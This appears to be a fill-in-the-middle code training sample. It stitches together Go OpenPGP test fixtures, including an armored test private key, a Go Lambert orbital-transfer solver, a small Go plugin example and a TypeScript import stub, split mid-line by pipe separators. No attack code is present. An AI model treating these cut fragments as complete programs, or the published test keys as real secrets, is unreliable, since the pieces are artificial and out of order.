3c0172ec87ea6ce42ccfa7dbdad66b745496c4873d8019e8c28d6b3"
const symmetricallyEncryptedCompressedHex = "8c0d04030302eb4a03808145d0d260c92f714339e13de5a79881216431925bf67ee2898ea61815f07894cd0703c50d0a76ef64d482196f47a8bc729af9b80bb6"
const dsaTestKeyHex = "9901a2044d6c49de110400cb5ce438cf9250907ac2ba5bf6547931270b89f7c4b53d9d09f4d0213a5ef2ec1f26806d3d259960f872a4a102ef1581ea3f6d6882d15134f21ef6a84de933cc34c47cc9106efe3bd84c6aec12e78523661e29bc1a61f0aab17fa58a627fd5fd33f5149153fbe8cd70edf3d963bc287ef875270ff14b5bfdd1bca4483793923b00a0fe46d76cb6e4cbdc568435cd5480af3266d610d303fe33ae8273f30a96d4d34f42fa28ce1112d425b2e3bf7ea553d526e2db6b9255e9dc7419045ce817214d1a0056dbc8d5289956a4b1b69f20f1105124096e6a438f41f2e2495923b0f34b70642607d45559595c7fe94d7fa85fc41bf7d68c1fd509ebeaa5f315f6059a446b9369c277597e4f474a9591535354c7e7f4fd98a08aa60400b130c24ff20bdfbf683313f5daebf1c9b34b3bdadfc77f2ddd72ee1fb17e56c473664bc21d66467655dd74b9005e3a2bacce446f1920cd7017231ae447b67036c9b431b8179deacd5120262d894c26bc015bffe3d827ba7087ad9b700d2ca1f6d16cc1786581e5dd065f293c31209300f9b0afcc3f7c08dd26d0a22d87580b4db41054657374204b65792033202844534129886204131102002205024d6c49de021b03060b090807030206150802090a0b0416020301021e01021780000a0910338934250ccc03607e0400a0bdb9193e8a6b96fc2dfc108ae848914b504481f100a09c4dc148cb693293a67af24dd40d2b13a9e36794"
const dsaTestKeyPrivateHex = "9501bb044d6c49de110400cb5ce438cf9250907ac2ba5bf6547931270b89f7c4b53d9d09f4d0213a5ef2ec1f26806d3d259960f872a4a102ef1581ea3f6d6882d15134f21ef6a84de933cc34c47cc9106efe3bd84c6aec12e78523661e29bc1a61f0aab17fa58a627fd5fd33f5149153fbe8cd70edf3d963bc287ef875270ff14b5bfdd1bca4483793923b00a0fe46d76cb6e4cbdc568435cd5480af3266d610d303fe33ae8273f30a96d4d34f42fa28ce1112d425b2e3bf7ea553d526e2db6b9255e9dc7419045ce817214d1a0056dbc8d5289956a4b1b69f20f1105124096e6a438f41f2e2495923b0f34b70642607d45559595c7fe94d7fa85fc41bf7d68c1fd509ebeaa5f315f6059a446b9369c277597e4f474a9591535354c7e7f4fd98a08aa60400b130c24ff20bdfbf683313f5daebf1c9b34b3bdadfc77f2ddd72ee1fb17e56c473664bc21d66467655dd74b9005e3a2bacce446f1920cd7017231ae447b67036c9b431b8179deacd5120262d894c26bc015bffe3d827ba7087ad9b700d2ca1f6d16cc1786581e5dd065f293c31209300f9b0afcc3f7c08dd26d0a22d87580b4d00009f592e0619d823953577d4503061706843317e4fee083db41054657374204b65792033202844534129886204131102002205024d6c49de021b03060b090807030206150802090a0b0416020301021e01021780000a0910338934250ccc03607e0400a0bdb9193e8a6b96fc2dfc108ae848914b504481f100a09c4dc148cb693293a67af24dd40d2b13a9e36794"
const p256TestKeyHex = "98520456e5b83813082a8648ce3d030107020304a2072cd6d21321266c758cc5b83fab0510f751cb8d91897cddb7047d8d6f185546e2107111b0a95cb8ef063c33245502af7a65f004d5919d93ee74eb71a66253b424502d3235362054657374204b6579203c696e76616c6964406578616d706c652e636f6d3e8879041313080021050256e5b838021b03050b09080702061508090a0b020416020301021e01021780000a0910d44a2c495918513e54e50100dfa64f97d9b47766fc1943c6314ba3f2b2a103d71ad286dc5b1efb96a345b0c80100dbc8150b54241f559da6ef4baacea6d31902b4f4b1bdc09b34bf0502334b7754b8560456e5b83812082a8648ce3d030107020304bfe3cea9cee13486f8d518aa487fecab451f25467d2bf08e58f63e5fa525d5482133e6a79299c274b068ef0be448152ad65cf11cf764348588ca4f6a0bcf22b6030108078861041813080009050256e5b838021b0c000a0910d44a2c495918513e4a4800ff49d589fa64024ad30be363a032e3a0e0e6f5db56ba4c73db850518bf0121b8f20100fd78e065f4c70ea5be9df319ea67e493b936fc78da834a71828043d3154af56e"
const p256TestKeyPrivateHex = "94a50456e5b83813082a8648ce3d030107020304a2072cd6d21321266c758cc5b83fab0510f751cb8d91897cddb7047d8d6f185546e2107111b0a95cb8ef063c33245502af7a65f004d5919d93ee74eb71a66253fe070302f0c2bfb0b6c30f87ee1599472b8636477eab23ced13b271886a4b50ed34c9d8436af5af5b8f88921f0efba6ef8c37c459bbb88bc1c6a13bbd25c4ce9b1e97679569ee77645d469bf4b43de637f5561b424502d3235362054657374204b6579203c696e76616c6964406578616d706c652e636f6d3e8879041313080021050256e5b838021b03050b09080702061508090a0b020416020301021e01021780000a0910d44a2c495918513e54e50100dfa64f97d9b47766fc1943c6314ba3f2b2a103d71ad286dc5b1efb96a345b0c80100dbc8150b54241f559da6ef4baacea6d31902b4f4b1bdc09b34bf0502334b77549ca90456e5b83812082a8648ce3d030107020304bfe3cea9cee13486f8d518aa487fecab451f25467d2bf08e58f63e5fa525d5482133e6a79299c274b068ef0be448152ad65cf11cf764348588ca4f6a0bcf22b603010807fe0703027510012471a603cfee2968dce19f732721ddf03e966fd133b4e3c7a685b788705cbc46fb026dc94724b830c9edbaecd2fb2c662f23169516cacd1fe423f0475c364ecc10abcabcfd4bbbda1a36a1bd8861041813080009050256e5b838021b0c000a0910d44a2c495918513e4a4800ff49d589fa64024ad30be363a032e3a0e0e6f5db56ba4c73db850518bf0121b8f20100fd78e065f4c70ea5be9df319ea67e493b936fc78da834a71828043d3154af56e"
const armoredPrivateKeyBlock = `-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: GnuPG v1.4.10 (GNU/Linux)
lQHYBE2rFNoBBADFwqWQIW/DSqcB4yCQqnAFTJ27qS5AnB46ccAdw3u4Greeu3Bp
idpoHdjULy7zSKlwR1EA873dO/k/e11Ml3dlAFUinWeejWaK2ugFP6JjiieSsrKn
vWNicdCS4HTWn0X4sjl0ZiAygw6GNhqEQ3cpLeL0g8E9hnYzJKQ0LWJa0QARAQAB
AAP/TB81EIo2VYNmTq0pK1ZXwUpxCrvAAIG3hwKjEzHcbQznsjNvPUihZ+NZQ6+X
0HCfPAdPkGDCLCb6NavcSW+iNnLTrdDnSI6+3BbIONqWWdRDYJhqZCkqmG6zqSfL
IdkJgCw94taUg5BWP/AAeQrhzjChvpMQTVKQL5mnuZbUCeMCAN5qrYMP2S9iKdnk
VANIFj7656ARKt/nf4CBzxcpHTyB8+d2CtPDKCmlJP6vL8t58Jmih+kHJMvC0dzn
gr5f5+sCAOOe5gt9e0am7AvQWhdbHVfJU0TQJx+m2OiCJAqGTB1nvtBLHdJnfdC9
TnXXQ6ZXibqLyBies/xeY2sCKL5qtTMCAKnX9+9d/5yQxRyrQUHt1NYhaXZnJbHx
q4ytu0eWz+5i68IYUSK69jJ1NWPM0T6SkqpB3KCAIv68VFm9PxqG1KmhSrQIVGVz
dCBLZXmIuAQTAQIAIgUCTasU2gIbAwYLCQgHAwIGFQgCCQoLBBYCAwECHgECF4AA
CgkQO9o98PRieSoLhgQAkLEZex02Qt7vGhZzMwuN0R22w3VwyYyjBx+fM3JFETy1
ut4xcLJoJfIaF5ZS38UplgakHG0FQ+b49i8dMij0aZmDqGxrew1m4kBfjXw9B/v+
eIqpODryb6cOSwyQFH0lQkXC040pjq9YqDsO5w0WYNXYKDnzRV0p4H1pweo2VDid
AdgETasU2gEEAN46UPeWRqKHvA99arOxee38fBt2CI08iiWyI8T3J6ivtFGixSqV
bRcPxYO/qLpVe5l84Nb3X71GfVXlc9hyv7CD6tcowL59hg1E/DC5ydI8K8iEpUmK
/UnHdIY5h8/kqgGxkY/T/hgp5fRQgW1ZoZxLajVlMRZ8W4tFtT0DeA+JABEBAAEA
A/0bE1jaaZKj6ndqcw86jd+QtD1SF+Cf21CWRNeLKnUds4FRRvclzTyUMuWPkUeX
TaNNsUOFqBsf6QQ2oHUBBK4VCHffHCW4ZEX2cd6umz7mpHW6XzN4DECEzOVksXtc
lUC1j4UB91DC/RNQqwX1IV2QLSwssVotPMPqhOi0ZLNY7wIA3n7DWKInxYZZ4K+6
rQ+POsz6brEoRHwr8x6XlHenq1Oki855pSa1yXIARoTrSJkBtn5oI+f8AzrnN0BN
oyeQAwIA/7E++3HDi5aweWrViiul9cd3rcsS0dEnksPhvS0ozCJiHsq/6GFmy7J8
QSHZPteedBnZyNp5jR+H7cIfVN3KgwH/Skq4PsuPhDq5TKK6i8Pc1WW8MA6DXTdU
nLkX7RGmMwjC0DBf7KWAlPjFaONAX3a8ndnz//fy1q7u2l9AZwrj1qa1iJ8EGAEC
AAkFAk2rFNoCGwwACgkQO9o98PRieSo2/QP/WTzr4ioINVsvN1akKuekmEMI3LAp
BfHwatufxxP1U+3Si/6YIk7kuPB9Hs+pRqCXzbvPRrI8NHZBmc8qIGthishdCYad
AHcVnXjtxrULkQFGbGvhKURLvS9WnzD/m1K2zzwxzkPTzT9/Yf06O6Mal5AdugPL
VrM0m72/jnpKo04=
=zNCn
-----END PGP PRIVATE KEY BLOCK-----`
const e2ePublicKey = `-----BEGIN PGP PUBLIC KEY BLOCK-----
Charset: UTF-8
xv8AAABSBAAAAAATCCqGSM49AwEHAgME1LRoXSpOxtHXDUdmuvzchyg6005qIBJ4
sfaSxX7QgH9RV2ONUhC+WiayCNADq+UMzuR/vunSr4aQffXvuGnR383/AAAAFDxk
Z2lsQHlhaG9vLWluYy5jb20+wv8AAACGBBATCAA4/wAAAAWCVGvAG/8AAAACiwn/
AAAACZC2VkQCOjdvYf8AAAAFlQgJCgv/AAAAA5YBAv8AAAACngEAAE1BAP0X8veD
24IjmI5/C6ZAfVNXxgZZFhTAACFX75jUA3oD6AEAzoSwKf1aqH6oq62qhCN/pekX
+WAsVMBhNwzLpqtCRjLO/wAAAFYEAAAAABIIKoZIzj0DAQcCAwT50ain7vXiIRv8
B1DO3x3cE/aattZ5sHNixJzRCXi2vQIA5QmOxZ6b5jjUekNbdHG3SZi1a2Ak5mfX
fRxC/5VGAwEIB8L/AAAAZQQYEwgAGP8AAAAFglRrwBz/AAAACZC2VkQCOjdvYQAA
FJAA9isX3xtGyMLYwp2F3nXm7QEdY5bq5VUcD/RJlj792VwA/1wH0pCzVLl4Q9F9
ex7En5r7rHR5xwX82Msc+Rq9dSyO
=7MrZ
-----END PGP PUBLIC KEY BLOCK-----`
const dsaKeyWithSHA512 = `9901a2044f04b07f110400db244efecc7316553ee08d179972aab87bb1214de7692593fcf5b6feb1c80fba268722dd464748539b85b81d574cd2d7ad0ca2444de4d849b8756bad7768c486c83a824f9bba4af773d11742bdfb4ac3b89ef8cc9452d4aad31a37e4b630d33927bff68e879284a1672659b8b298222fc68f370f3e24dccacc4a862442b9438b00a0ea444a24088dc23e26df7daf8f43cba3bffc4fe703fe3d6cd7fdca199d54ed8ae501c30e3ec7871ea9cdd4cf63cfe6fc82281d70a5b8bb493f922cd99fba5f088935596af087c8d818d5ec4d0b9afa7f070b3d7c1dd32a84fca08d8280b4890c8da1dde334de8e3cad8450eed2a4a4fcc2db7b8e5528b869a74a7f0189e11ef097ef1253582348de072bb07a9fa8ab838e993cef0ee203ff49298723e2d1f549b00559f886cd417a41692ce58d0ac1307dc71d85a8af21b0cf6eaa14baf2922d3a70389bedf17cc514ba0febbd107675a372fe84b90162a9e88b14d4b1c6be855b96b33fb198c46f058568817780435b6936167ebb3724b680f32bf27382ada2e37a879b3d9de2abe0c3f399350afd1ad438883f4791e2e3b4184453412068617368207472756e636174696f6e207465737488620413110a002205024f04b07f021b03060b090807030206150802090a0b0416020301021e01021780000a0910ef20e0cefca131581318009e2bf3bf047a44d75a9bacd00161ee04d435522397009a03a60d51bd8a568c6c021c8d7cf1be8d990d6417b0020003`
const unknownHashFunctionHex = `8a00000040040001990006050253863c24000a09103b4fe6acc0b21f32ffff01010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101`
const missingHashFunctionHex = `8a00000040040001030006050253863c24000a09103b4fe6acc0b21f32ffff0101010101010101010101010101010101010101010101010101010101010101010101010101`
const campbellQuine = `a0b001000300fcffa0b001000d00f2ff000300fcffa0b001000d00f2ff8270a01c00000500faff8270a01c00000500faff000500faff001400ebff8270a01c00000500faff000500faff001400ebff428821c400001400ebff428821c400001400ebff428821c400001400ebff428821c400001400ebff428821c400000000ffff000000ffff000b00f4ff428821c400000000ffff000000ffff000b00f4ff0233214c40000100feff000233214c40000100feff0000`
const keyV4forVerifyingSignedMessageV3 = `-----BEGIN PGP PUBLIC KEY BLOCK-----
Comment: GPGTools - https://gpgtools.org
mI0EVfxoFQEEAMBIqmbDfYygcvP6Phr1wr1XI41IF7Qixqybs/foBF8qqblD9gIY
BKpXjnBOtbkcVOJ0nljd3/sQIfH4E0vQwK5/4YRQSI59eKOqd6Fx+fWQOLG+uu6z
tewpeCj9LLHvibx/Sc7VWRnrznia6ftrXxJ/wHMezSab3tnGC0YPVdGNABEBAAG0
JEdvY3J5cHRvIFRlc3QgS2V5IDx0aGVtYXhAZ21haWwuY29tPoi5BBMBCgAjBQJV
/GgVAhsDBwsJCAcDAgEGFQgCCQoLBBYCAwECHgECF4AACgkQeXnQmhdGW9PFVAP+
K7TU0qX5ArvIONIxh/WAweyOk884c5cE8f+3NOPOOCRGyVy0FId5A7MmD5GOQh4H
JseOZVEVCqlmngEvtHZb3U1VYtVGE5WZ+6rQhGsMcWP5qaT4soYwMBlSYxgYwQcx
YhN9qOr292f9j2Y//TTIJmZT4Oa+lMxhWdqTfX+qMgG4jQRV/GgVAQQArhFSiij1
b+hT3dnapbEU+23Z1yTu1DfF6zsxQ4XQWEV3eR8v+8mEDDNcz8oyyF56k6UQ3rXi
UMTIwRDg4V6SbZmaFbZYCOwp/EmXJ3rfhm7z7yzXj2OFN22luuqbyVhuL7LRdB0M
pxgmjXb4tTvfgKd26x34S+QqUJ7W6uprY4sAEQEAAYifBBgBCgAJBQJV/GgVAhsM
AAoJEHl50JoXRlvT7y8D/02ckx4OMkKBZo7viyrBw0MLG92i+DC2bs35PooHR6zz
786mitjOp5z2QWNLBvxC70S0qVfCIz8jKupO1J6rq6Z8CcbLF3qjm6h1omUBf8Nd
EfXKD2/2HV6zMKVknnKzIEzauh+eCKS2CeJUSSSryap/QLVAjRnckaES/OsEWhNB
=RZia
-----END PGP PUBLIC KEY BLOCK-----
`
const signedMessageV3 = `-----BEGIN PGP MESSAGE-----
Comment: GPGTools - https://gpgtools.org
owGbwMvMwMVYWXlhlrhb9GXG03JJDKF/MtxDMjKLFYAoUaEktbhEITe1uDgxPVWP
q5NhKjMrWAVcC9evD8z/bF/uWNjqtk/X3y5/38XGRQHm/57rrDRYuGnTw597Xqka
uM3137/hH3Os+Jf2dc0fXOITKwJvXJvecPVs0ta+Vg7ZO1MLn8w58Xx+6L58mbka
DGHyU9yTueZE8D+QF/Tz28Y78dqtF56R1VPn9Xw4uJqrWYdd7b3vIZ1V6R4Nh05d
iT57d/OhWwA=
=hG7R
-----END PGP MESSAGE-----
`
| {
// dsaKeyWithSHA512 was generated with GnuPG and --cert-digest-algo
// SHA512 in order to require DSA hash truncation to verify correctly.
_, err := ReadKeyRing(readerFromHex(dsaKeyWithSHA512))
if err != nil {
t.Error(err)
}
} |
tools.go | package smd
import (
"errors"
"fmt"
"log"
"math"
"os"
"time"
"github.com/gonum/floats"
"github.com/gonum/matrix/mat64"
)
// TransferType defines the type of Lambert transfer
type TransferType uint8
// Longway returns whether or not this is the long way.
func (t TransferType) Longway() bool {
switch t {
case TType1:
fallthrough
case TType3:
return false
case TType2:
fallthrough
case TType4:
return true
default:
panic(fmt.Errorf("cannot determine whether long or short way for %s", t))
}
}
// Revs returns the number of revolutions given the type.
func (t TransferType) Revs() float64 {
switch t {
case TTypeAuto:
fallthrough // auto-revs is limited to zero revolutions
case TType1:
fallthrough
case TType2:
return 0
case TType3:
fallthrough
case TType4:
return 1
default:
panic("unknown transfer type")
}
}
func (t TransferType) String() string {
switch t {
case TTypeAuto:
return "auto-revs"
case TType1:
return "type-1"
case TType2:
return "type-2"
case TType3:
return "type-3"
case TType4:
return "type-4"
default:
panic("unknown transfer type")
}
}
func TransferTypeFromInt(ttype int) TransferType {
switch ttype {
case 4:
return TType4
case 3:
return TType3
default:
return TTypeAuto
}
}
const (
// TTypeAuto lets the Lambert solver determine the type
TTypeAuto TransferType = iota + 1
// TType1 is transfer of type 1 (zero revolution, short way)
TType1
// TType2 is transfer of type 2 (zero revolution, long way)
TType2
// TType3 is transfer of type 3 (one revolution, short way)
TType3
// TType4 is transfer of type 4 (one revolution, long way)
TType4
lambertε = 1e-4 // General epsilon
lambertTε = 1e-4 // Time epsilon
lambertνε = (5e-5 / 180) * math.Pi // 0.00005 degrees
)
// Hohmann computes a Hohmann transfer. It returns the departure and arrival velocities, and the time of flight.
// To get final computations:
// ΔvInit = vDeparture - vI
// ΔvFinal = vArrival - vF
func Hohmann(rI, vI, rF, vF float64, body CelestialObject) (vDeparture, vArrival float64, tof time.Duration) {
aTransfer := 0.5 * (rI + rF)
vDeparture = math.Sqrt((2 * body.GM() / rI) - (body.GM() / aTransfer))
vArrival = math.Sqrt((2 * body.GM() / rF) - (body.GM() / aTransfer))
tof = time.Duration(math.Pi*math.Sqrt(math.Pow(aTransfer, 3)/body.GM())) * time.Second
return
}
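// Usage sketch (hypothetical values; assumes a CelestialObject such as Earth is
// defined, with radii in km and velocities in km/s):
//   vDep, vArr, tof := Hohmann(rI, vI, rF, vF, Earth)
//   ΔvInit := vDep - vI
//   ΔvFinal := vArr - vF
//   fmt.Printf("total Δv: %f km/s\ttof: %s\n", math.Abs(ΔvInit)+math.Abs(ΔvFinal), tof)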
// Lambert solves the Lambert boundary problem:
// Given the initial and final radii and a central body, it returns the needed initial and final velocities
// along with φ, the square of the difference in eccentric anomaly. Note that the direction of motion
// is computed directly in this function to simplify the generation of pork-chop plots.
func Lambert(Ri, Rf *mat64.Vector, Δt0 time.Duration, ttype TransferType, body CelestialObject) (Vi, Vf *mat64.Vector, φ float64, err error) {
// Initialize return variables
Vi = mat64.NewVector(3, nil)
Vf = mat64.NewVector(3, nil)
// Sanity checks
Rir, _ := Ri.Dims()
Rfr, _ := Rf.Dims()
if Rir != Rfr || Rir != 3 {
err = errors.New("initial and final radii must be 3x1 vectors")
return
}
Δt0Sec := Δt0.Seconds()
rI := mat64.Norm(Ri, 2)
rF := mat64.Norm(Rf, 2)
cosΔν := mat64.Dot(Ri, Rf) / (rI * rF)
// Compute the direction of motion
νI := math.Atan2(Ri.At(1, 0), Ri.At(0, 0))
νF := math.Atan2(Rf.At(1, 0), Rf.At(0, 0))
dm := 1.0
if ttype == TType2 {
dm = -1.0
} else if ttype == TTypeAuto {
Δν := math.Atan2(Rf.At(1, 0), Rf.At(0, 0)) - math.Atan2(Ri.At(1, 0), Ri.At(0, 0))
if Δν > 2*math.Pi {
Δν -= 2 * math.Pi
} else if Δν < 0 {
Δν += 2 * math.Pi
}
if Δν > math.Pi {
dm = -1.0
} // We don't do the < math.Pi case because that's the initial value anyway.
}
A := dm * math.Sqrt(rI*rF*(1+cosΔν))
if νF-νI < lambertνε && floats.EqualWithinAbs(A, 0, lambertε) {
err = errors.New("cannot compute trajectory: Δν ~=0 and A ~=0")
return
}
φup := 4 * math.Pow(math.Pi, 2) * math.Pow(ttype.Revs()+1, 2)
φlow := -4 * math.Pi
if ttype.Revs() > 0 {
// Scan candidate φ values to bracket the one minimizing the time of flight
Δtmin := 4000 * 24 * 3600.0
φBound := 0.0
for φP := 15.; φP < φup; φP += 0.1 {
c2 := (1 - math.Cos(math.Sqrt(φP))) / φP
c3 := (math.Sqrt(φP) - math.Sin(math.Sqrt(φP))) / math.Sqrt(math.Pow(φP, 3))
y := rI + rF + A*(φP*c3-1)/math.Sqrt(c2)
χ := math.Sqrt(y / c2)
Δt := (math.Pow(χ, 3)*c3 + A*math.Sqrt(y)) / math.Sqrt(body.μ)
if Δtmin > Δt {
Δtmin = Δt
φBound = φP
}
}
// Determine whether we are going up or down bounds.
if ttype == TType3 {
φlow = φup
φup = φBound
} else if ttype == TType4 {
φlow = φBound
}
}
// Initial guesses for c2 and c3
c2 := 1 / 2.
c3 := 1 / 6.
var Δt, y float64
var iteration uint
for math.Abs(Δt-Δt0Sec) > lambertTε {
if iteration > 1000 {
err = errors.New("did not converge after 1000 iterations")
return
}
iteration++
y = rI + rF + A*(φ*c3-1)/math.Sqrt(c2)
if A > 0 && y < 0 {
tmpIt := 0
for y < 0 {
φ += 0.1
y = rI + rF + A*(φ*c3-1)/math.Sqrt(c2)
if tmpIt > 500 {
err = errors.New("did not converge after 500 attempts to increase φ")
return
}
tmpIt++
}
}
χ := math.Sqrt(y / c2)
Δt = (math.Pow(χ, 3)*c3 + A*math.Sqrt(y)) / math.Sqrt(body.μ)
if ttype != TType3 {
if Δt <= Δt0Sec {
φlow = φ
} else {
φup = φ
}
} else {
if Δt >= Δt0Sec {
φlow = φ
} else {
φup = φ
}
}
φ = (φup + φlow) / 2
if φ > lambertε {
sφ := math.Sqrt(φ)
ssφ, csφ := math.Sincos(sφ)
c2 = (1 - csφ) / φ
c3 = (sφ - ssφ) / math.Sqrt(math.Pow(φ, 3))
} else if φ < -lambertε {
sφ := math.Sqrt(-φ)
c2 = (1 - math.Cosh(sφ)) / φ
c3 = (math.Sinh(sφ) - sφ) / math.Sqrt(math.Pow(-φ, 3))
} else {
c2 = 1 / 2.
c3 = 1 / 6.
}
}
f := 1 - y/rI
gDot := 1 - y/rF
g := (A * math.Sqrt(y/body.μ))
// Compute velocities
Rf2 := mat64.NewVector(3, nil)
Vi.AddScaledVec(Rf, -f, Ri)
Vi.ScaleVec(1/g, Vi)
Rf2.ScaleVec(gDot, Rf)
Vf.AddScaledVec(Rf2, -1, Ri)
Vf.ScaleVec(1/g, Vf)
return
}
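// Usage sketch (assumes Ri and Rf are heliocentric 3x1 position vectors; Sun is
// the CelestialObject used by PCPGenerator below):
//   Vi, Vf, φ, err := Lambert(Ri, Rf, 96*24*time.Hour, TTypeAuto, Sun)
//   if err == nil {
//       // Vi and Vf hold the required departure and arrival velocities.
//   }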
// PCPGenerator generates the PCP files used for contour plots in Matlab (and optionally prints the Matlab command).
func PCPGenerator(initPlanet, arrivalPlanet CelestialObject, initLaunch, maxLaunch, initArrival, maxArrival time.Time, ptsPerLaunchDay, ptsPerArrivalDay float64, transferType TransferType, plotC3, verbose, output bool) (c3Map, tofMap, vinfMap map[time.Time][]float64, vInfInitVecs, vInfArriVecs map[time.Time][]mat64.Vector) {
launchWindow := int(maxLaunch.Sub(initLaunch).Hours() / 24) //days
arrivalWindow := int(maxArrival.Sub(initAr | rival).Hours() / 24) //days
// Create the output arrays
c3Map = make(map[time.Time][]float64)
tofMap = make(map[time.Time][]float64)
vinfMap = make(map[time.Time][]float64)
vInfInitVecs = make(map[time.Time][]mat64.Vector)
vInfArriVecs = make(map[time.Time][]mat64.Vector)
if verbose {
log.Printf("[info] %s depart window: %d days\t%s arrival window: %d days\t transfer: %s", initPlanet.Name, launchWindow, arrivalPlanet.Name, arrivalWindow, transferType)
}
// Stores the content of the dat file.
// No trailing new line because it's added in the for loop.
dat := fmt.Sprintf("%% %s -> %s\n%%arrival days as new lines, departure as new columns", initPlanet, arrivalPlanet)
hdls := make([]*os.File, 4)
var fNames []string
if plotC3 {
fNames = []string{"c3", "tof", "vinf", "dates"}
} else {
fNames = []string{"vinf-init", "tof", "vinf-arrival", "dates"}
}
pcpName := fmt.Sprintf("%s-to-%s", initPlanet.Name, arrivalPlanet.Name)
if output {
for i, name := range fNames {
// Write CSV file.
f, err := os.Create(fmt.Sprintf("./contour-%s-%s.dat", pcpName, name))
if err != nil {
panic(err)
}
defer f.Close()
if _, err := f.WriteString(dat); err != nil {
panic(err)
}
hdls[i] = f
}
// Let's write the date information now and close that file.
hdls[3].WriteString(fmt.Sprintf("\n%%departure: \"%s\"\n%%arrival: \"%s\"\n%d,%d\n%d,%d\n", initLaunch.Format("2006-Jan-02"), initArrival.Format("2006-Jan-02"), 1, launchWindow, 1, arrivalWindow))
hdls[3].Close()
}
for launchDay := 0.; launchDay < float64(launchWindow); launchDay += 1 / ptsPerLaunchDay {
// New line in files
if output {
for _, hdl := range hdls[:3] {
if _, err := hdl.WriteString("\n"); err != nil {
panic(err)
}
}
}
launchDT := initLaunch.Add(time.Duration(launchDay*24*3600) * time.Second)
if verbose {
log.Printf("[info] depart %s on %s", initPlanet.Name, launchDT)
}
// Initialize the values
c3Map[launchDT] = make([]float64, arrivalWindow*int(ptsPerArrivalDay+1))
tofMap[launchDT] = make([]float64, arrivalWindow*int(ptsPerArrivalDay+1))
vinfMap[launchDT] = make([]float64, arrivalWindow*int(ptsPerArrivalDay+1))
vInfInitVecs[launchDT] = make([]mat64.Vector, arrivalWindow*int(ptsPerArrivalDay+1))
vInfArriVecs[launchDT] = make([]mat64.Vector, arrivalWindow*int(ptsPerArrivalDay+1))
initOrbit := initPlanet.HelioOrbit(launchDT)
initPlanetR := mat64.NewVector(3, initOrbit.R())
initPlanetV := mat64.NewVector(3, initOrbit.V())
arrivalIdx := 0
for arrivalDay := 0.; arrivalDay < float64(arrivalWindow); arrivalDay += 1 / ptsPerArrivalDay {
arrivalDT := initArrival.Add(time.Duration(arrivalDay*24) * time.Hour)
// Skip arrival dates that precede the launch date.
if arrivalDT.Before(launchDT) {
continue
}
arrivalOrbit := arrivalPlanet.HelioOrbit(arrivalDT)
arrivalR := mat64.NewVector(3, arrivalOrbit.R())
arrivalV := mat64.NewVector(3, arrivalOrbit.V())
tof := arrivalDT.Sub(launchDT)
Vi, Vf, _, err := Lambert(initPlanetR, arrivalR, tof, transferType, Sun)
var c3, vInfArrival float64
if err != nil {
if verbose {
fmt.Printf("departure: %s\tarrival: %s\t\t%s\n", launchDT, arrivalDT, err)
}
c3 = math.Inf(1)
vInfArrival = math.Inf(1)
// Store a nil vector so we don't lose track of indexing
vInfInitVecs[launchDT][arrivalIdx] = *mat64.NewVector(3, nil)
vInfArriVecs[launchDT][arrivalIdx] = *mat64.NewVector(3, nil)
} else {
// Compute the c3
VInfInit := mat64.NewVector(3, nil)
VInfInit.SubVec(initPlanetV, Vi)
// WARNING: When *not* plotting the c3, we just store the V infinity at departure in the c3 variable!
if plotC3 {
c3 = math.Pow(mat64.Norm(VInfInit, 2), 2)
} else {
c3 = mat64.Norm(VInfInit, 2)
}
if math.IsInf(c3, 1) {
c3 = 0
}
// Compute the v_infinity at destination
VInfArrival := mat64.NewVector(3, nil)
VInfArrival.SubVec(Vf, arrivalV)
vInfArrival = mat64.Norm(VInfArrival, 2)
vInfInitVecs[launchDT][arrivalIdx] = *VInfInit
vInfArriVecs[launchDT][arrivalIdx] = *VInfArrival
}
if output {
// Store data in the files
hdls[0].WriteString(fmt.Sprintf("%f,", c3))
hdls[1].WriteString(fmt.Sprintf("%f,", tof.Hours()/24))
hdls[2].WriteString(fmt.Sprintf("%f,", vInfArrival))
}
// and in the arrays
c3Map[launchDT][arrivalIdx] = c3
tofMap[launchDT][arrivalIdx] = tof.Hours() / 24
vinfMap[launchDT][arrivalIdx] = vInfArrival
arrivalIdx++
}
if verbose {
log.Printf("[done] depart %s on %s", initPlanet.Name, launchDT)
}
}
if verbose && output {
// Print the matlab command to help out
if plotC3 {
fmt.Printf("=== MatLab ===\npcpplots('%s', '%s', '%s', '%s')\n", pcpName, initLaunch.Format("2006-01-02"), initArrival.Format("2006-01-02"), arrivalPlanet.Name)
} else {
fmt.Printf("=== MatLab ===\npcpplotsVinfs('%s', '%s', '%s', '%s', '%s')\n", pcpName, initLaunch.Format("2006-01-02"), initArrival.Format("2006-01-02"), initPlanet.Name, arrivalPlanet.Name)
}
}
if verbose {
log.Printf("[done] %s depart window: %d days\t%s arrival window: %d days\t transfer: %s", initPlanet.Name, launchWindow, arrivalPlanet.Name, arrivalWindow, transferType)
}
return
}
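// Usage sketch (assumes Earth and Mars are defined CelestialObjects and the four
// time.Time values delimit the launch and arrival windows):
//   c3Map, tofMap, vinfMap, _, _ := PCPGenerator(Earth, Mars, launch0, launch1,
//       arrival0, arrival1, 1, 1, TTypeAuto, true, true, true)
// The returned maps are keyed by launch date; the generated .dat files can then
// be loaded in Matlab with the printed command.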
|
|
main.go | package main
import (
"fmt"
"../pface"
)
var Plugin MyPlugin
func | () {
// the init function can be used for setup before the plugin is executed
Plugin.x = 1
}
type MyPlugin struct {
conf pface.Config
x int
}
func (p *MyPlugin) ID() string {
return "p2"
}
func (p *MyPlugin) Initialize(conf pface.Config) error {
p.conf = conf
return nil
}
func (p *MyPlugin) Run() error {
fmt.Printf("X : %d\n", p.x)
fmt.Printf("App: %s\n", p.conf.AppVersion())
return nil
}
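// Usage sketch (assumes this package is compiled with `go build -buildmode=plugin`
// into p2.so; the host would then load it roughly like this):
//   p, _ := plugin.Open("p2.so")
//   sym, _ := p.Lookup("Plugin")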
| init |
debug.ts | import { rpcHash } from "../../../core/jsonrpc/types/base-types";
import {
rpcDebugTracingConfig,
RpcDebugTracingConfig,
} from "../../../core/jsonrpc/types/input/debugTraceTransaction";
